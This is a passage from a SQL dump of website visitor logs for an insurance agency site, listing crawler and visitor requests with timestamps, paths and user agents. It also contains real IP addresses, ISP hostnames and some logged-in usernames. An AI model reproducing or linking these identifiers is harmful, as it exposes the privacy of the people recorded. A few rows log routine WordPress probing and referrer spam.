rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24414,'0b_699af58915d246995c5b00ee225023fc','1462306820','69.58.178.59','69.58.178.59','/agent-tools/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24417,'0b_699af58915d246995c5b00ee225023fc','1462306832','69.58.178.59','69.58.178.59','/register/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24420,'0b_699af58915d246995c5b00ee225023fc','1462306845','69.58.178.59','69.58.178.59','/insentives/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24422,'0b_699af58915d246995c5b00ee225023fc','1462306857','69.58.178.59','69.58.178.59','/licensing-contracting/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24423,'0b_699af58915d246995c5b00ee225023fc','1462306869','69.58.178.59','69.58.178.59','/carriers/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24426,'0b_699af58915d246995c5b00ee225023fc','1462306880','69.58.178.59','69.58.178.59','/case-status/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24429,'0b_699af58915d246995c5b00ee225023fc','1462306892','69.58.178.59','69.58.178.59','/forms/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24432,'0b_5d4b06249ad8bae4508baae2d5641c35','1462308728','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 50','us','1366 x 768','Google','','','','','0','0',0),(24434,'0b_69bae393ddfb00dd711ed49996b9831e','1462309420','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24435,'0b_4835ecf7611d57ec323959fe24eeef9d','1462309468','66.249.64.160','crawl-66-249-64-160.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24437,'0b_d5c7c7c8c37af38de68f68c727c688f5','1462310705','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4','http://oils.afora.ru/','',0,'Win2000','OffByOne','','','','','','','','0','0',0),(24440,'0b_d5c7c7c8c37af38de68f68c727c688f5','1462310705','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4','http://oils.afora.ru/','',0,'Win2000','OffByOne','','','','','','','','0','0',0),(24443,'0b_651f006db2f5fa868f11a37bac3c4b59','1462311517','213.111.196.87','87.196-pool.nikopol.net','/?author=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','http://empireins.com/?author=1','',0,'Win7','Chrome 31','ru','','','','','','','0','0',0),(24446,'0b_0a38b6a60d833c9eb797140b4441344a','1462312073','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(24447,'0b_0a38b6a60d833c9eb797140b4441344a','1462312075','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(24449,'0b_0a38b6a60d833c9eb797140b4441344a','1462312086','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(24450,'0b_0a38b6a60d833c9eb797140b4441344a','1462312109','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','51',0),(24453,'0b_1311f1a753fe6d5b3cf6cf0003ff98f9','1462312141','155.188.123.19','155.188.123.19','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwid0LeY8b7MAhVL5CYKHWSgAI4QFggdMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&sig2=asJatbl6M4sHeHTY3Kohkw','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24455,'0b_1311f1a753fe6d5b3cf6cf0003ff98f9','1462312136','155.188.123.19','155.188.123.19','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwid0LeY8b7MAhVL5CYKHWSgAI4QFggdMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&sig2=asJatbl6M4sHeHTY3Kohkw&bvm=bv.121099550,d.eWE','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24456,'0b_1311f1a753fe6d5b3cf6cf0003ff98f9','1462312164','155.188.123.19','155.188.123.19','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24458,'0b_0a38b6a60d833c9eb797140b4441344a','1462312195','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','51',0),(24461,'0b_0a38b6a60d833c9eb797140b4441344a','1462312233','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(24462,'0b_0f4f00c0349416244ee2fcbe49b15aba','1462312778','192.3.130.106','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(24464,'0b_1e4a035955a17b58b9aadd2e9f56c172','1462312777','72.51.45.40','72.51.45.40','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(24465,'0b_159003b3975c4481a1ce573b097b1718','1462312950','198.40.51.146','198.40.51.146','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 (KnilBot)','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(24467,'0b_24e79cd956460f96605131a9616342ed','1462319659','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24470,'0b_90f6c17cac42e4a07322caf78ea8063e','1462320144','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)','http://my-big-family.com/','',0,'Win95','IE 5','','','','','','','','0','0',0),(24473,'0b_af89261c7ff5c3e9ddefb836b7c1efd6','1462326537','66.249.64.166','crawl-66-249-64-166.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24474,'0b_b9fea142e84ae03edfa50b303d18272f','1462327554','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24476,'0b_976aaca93fc478564f8b929d0a75d55e','1462328582','66.249.64.154','crawl-66-249-64-154.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(24477,'0b_b7797a6a874a72d6d9965f1031260b9b','1462332655','66.249.64.241','crawl-66-249-64-241.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24480,'0b_b7797a6a874a72d6d9965f1031260b9b','1462332659','66.249.64.251','crawl-66-249-64-251.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(24483,'0b_76fa57f005f1e67f008f4211ce3dc7d1','1462333814','66.249.83.137,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(24485,'0b_1977c8b96f837fdb5a4cf2d7241c364f','1462333815','66.249.83.144,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(24486,'0b_69eae7a8483ca2ddd01462203a417f5b','1462334024','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24488,'0b_69eae7a8483ca2ddd01462203a417f5b','1462334026','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24489,'0b_69eae7a8483ca2ddd01462203a417f5b','1462334029','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24492,'0b_69eae7a8483ca2ddd01462203a417f5b','1462334055','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(24495,'0b_69eae7a8483ca2ddd01462203a417f5b','1462335187','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(24497,'0b_69eae7a8483ca2ddd01462203a417f5b','1462335200','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(24498,'0b_69eae7a8483ca2ddd01462203a417f5b','1462335337','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(24501,'0b_69eae7a8483ca2ddd01462203a417f5b','1462335338','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','0',0),(24504,'0b_69eae7a8483ca2ddd01462203a417f5b','1462335344','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(24506,'0b_69eae7a8483ca2ddd01462203a417f5b','1462335350','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(24509,'0b_94cef20d3ebcd23657dd8d5984b325c8','1462336311','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(24512,'0b_bfe46657cea1d57884ac07897b360dbf','1462338250','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(24513,'0b_d9da02cf82c1774e9967d17a4e3d2e05','1462338251','180.76.15.12','baiduspider-180-76-15-12.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(24515,'0b_8897c38d536d8a042ada4e4286f75b63','1462338430','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24518,'0b_bbd5504b86064563be04c93617dbdc51','1462338941','78.135.79.142','static-142-79-135-78.sadecehosting.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(24521,'0b_bbd5504b86064563be04c93617dbdc51','1462338946','78.135.79.142','static-142-79-135-78.sadecehosting.net','/robots.txt','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(24524,'0b_59391821cf0087221d6d4631e8bef694','1462341284','221.231.6.195','221.231.6.195','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','cn','','','Spoofer bot','','','','0','0',0),(24527,'0b_40859d4eb36644184c7e46f8a587cf53','1462341944','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(24528,'0b_b507b7a3799f4901fe8a8fe039f0d3e1','1462341945','100.43.81.146','spider-100-43-81-146.yandex.com','/contact/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24531,'0b_fbf9d7fddc43fa60dafa50db208ccbfd','1462343806','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24533,'0b_c076be44d38ee422a5b952540d3e6b4e','1462344377','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24534,'0b_7c8b114a2b671b6652f95b4d4b701494','1462350129','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)','http://yoursitename.ru/','',0,'WinXP','AOL 9','','','','','','','','0','0',0),(24537,'0b_32d65361abed6b5c66e5f75d026c0b61','1462350587','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24539,'0b_7984c211fee24577be807e25d912339c','1462352943','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24542,'0b_64a3b420f485dc798ea3c546ce0a2576','1462354088','138.201.46.148','static.148.46.201.138.clients.your-server.de','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','de','','','','','','','0','0',0),(24545,'0b_06018ff7afd22d041b8153ca97e3633c','1462354355','172.245.100.87','172-245-100-87-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(24548,'0b_9a7f024011657c35df19583222030fbc','1462355298','178.162.199.89','178.162.199.89','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','','','','Unknown Spider','','','','0','0',0),(24551,'0b_9a7f024011657c35df19583222030fbc','1462355308','178.162.199.89','178.162.199.89','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','','','','Unknown Spider','','','','0','0',0),(24552,'0b_63daebb3dc01f86463be0cba91d6d585','1462356272','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24554,'0b_83505a2c21d3cf2dea9ddf660733776a','1462356275','199.30.16.162','msnbot-199-30-16-162.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(24555,'0b_23f920486bb8c637fdf9dbb18eea0b75','1462357322','5.9.142.226','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(24558,'0b_23f920486bb8c637fdf9dbb18eea0b75','1462357324','5.9.142.226','majestic12.co.uk','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(24560,'0b_23f920486bb8c637fdf9dbb18eea0b75','1462357326','5.9.142.226','majestic12.co.uk','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(24561,'0b_c691afe3229cfc0f65d240892c7a3527','1462357973','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24564,'0b_18622dcc263586f513ed10421e05bcef','1462358798','208.115.111.66','208-115-111-66-reverse.wowrack.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24567,'0b_e9c5c9b01350f64a5e3a3547e31a835c','1462362052','82.193.127.15','82.193.127.15.cl.ipnet.ua','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','0','0',0),(24569,'0b_e9c5c9b01350f64a5e3a3547e31a835c','1462362055','82.193.127.15','82.193.127.15.cl.ipnet.ua','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','0','0',0),(24572,'0b_2203d8469058cceb64dafc61ba9bc270','1462363508','149.202.49.56','56.ip-149-202-49.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(24575,'0b_2203d8469058cceb64dafc61ba9bc270','1462363512','149.202.49.56','56.ip-149-202-49.eu','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(24576,'0b_68044ce3313b2cfb682270bbfdcc905b','1462364232','180.76.15.20','baiduspider-180-76-15-20.crawl.baidu.com','/carriers/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(24578,'0b_1a6991239fe0b06201a1ae4fe3578819','1462365221','52.13.115.54','ec2-52-13-115-54.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; http://spyonweb.com spyonweb@gmail.com','','',0,'Win7','','','','','Unknown Spider','','','','0','0',0),(24579,'0b_1a6991239fe0b06201a1ae4fe3578819','1462365226','52.13.115.54','ec2-52-13-115-54.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; http://spyonweb.com spyonweb@gmail.com','','',0,'Win7','Google Chrome','','','','Unknown Spider','','','','0','0',0),(24582,'0b_7240a6869f3a499bd3449650534103bf','1462365900','213.155.24.74','74.24.155.213.hosting.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinVista','Firefox 16','ua','','','','','','','0','0',0),(24584,'0b_95d7f1a7d2ad37dd86302aee76635672','1462366636','128.177.161.166','128.177.161.166','/pay','Mozilla/5.0 (Linux; Android 4.2.2; en-us; SAMSUNG SGH-M819N Build/JDQ39) AppleWebKit/535.19 (KHTML, like Gecko) Version/1.0 Chrome/18.0.1025.308 Mobile Safari/535.19','','',0,'Android 4','Safari 1','us','','','','','','','0','0',0),(24585,'0b_cb22682e2eb6da4828d05be7ad3c929e','1462367396','66.87.116.62','66-87-116-62.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(24587,'0b_bdc1f221e4825fc6195c1762d03f9260','1462367398','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24588,'0b_bdc1f221e4825fc6195c1762d03f9260','1462367399','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24590,'0b_cc44508ac4fa5b9df018947087a90c1f','1462367444','136.243.152.18','static.18.152.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24593,'0b_cc44508ac4fa5b9df018947087a90c1f','1462367447','136.243.152.18','static.18.152.243.136.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24596,'0b_cc44508ac4fa5b9df018947087a90c1f','1462367451','136.243.152.18','static.18.152.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24599,'0b_cc44508ac4fa5b9df018947087a90c1f','1462367454','136.243.152.18','static.18.152.243.136.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24602,'0b_cc44508ac4fa5b9df018947087a90c1f','1462367459','136.243.152.18','static.18.152.243.136.clients.your-server.de','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24605,'0b_cc44508ac4fa5b9df018947087a90c1f','1462367467','136.243.152.18','static.18.152.243.136.clients.your-server.de','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24608,'0b_cc44508ac4fa5b9df018947087a90c1f','1462367475','136.243.152.18','static.18.152.243.136.clients.your-server.de','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24609,'0b_cc44508ac4fa5b9df018947087a90c1f','1462367478','136.243.152.18','static.18.152.243.136.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24611,'0b_187bb8625ebd14153552bbe4ca218cb8','1462367683','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24614,'0b_91b9ac5e9b0055ae0ec3e85267a66c02','1462368116','149.56.43.99','149.56.43.99','/contact/','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(24615,'0b_89d9c2aedb25e1ace06a89f10b269daf','1462368357','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, 